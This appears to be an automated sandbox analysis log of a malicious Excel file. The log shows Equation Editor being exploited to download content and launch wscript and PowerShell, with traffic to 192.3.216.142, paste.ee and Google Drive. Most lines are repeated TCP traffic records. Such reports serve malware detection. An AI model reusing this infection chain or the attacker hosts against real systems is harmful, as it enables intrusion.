    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.216.142 Port: 80Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49164 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.22:49165 version: TLS 1.0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036605B6 ShellExecuteW,ExitProcess,2_2_036605B6
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660588 URLDownloadToFileW,2_2_03660588
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036605A1 ShellExecuteW,ExitProcess,2_2_036605A1
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660442 ExitProcess,2_2_03660442
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036605DB ExitProcess,2_2_036605DB
    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficDNS query: name: paste.ee
    Source: global trafficDNS query: name: paste.ee
    Source: global trafficDNS query: name: drive.google.com
    Source: global trafficDNS query: name: drive.usercontent.google.com
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.142:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.142:80
    Source: global trafficTCP traffic: 192.3.216.142:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.142:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.142:80
    Source: global trafficTCP traffic: 192.3.216.142:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.3.216.142:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.3.216.142:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.142:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.142:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.216.142:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
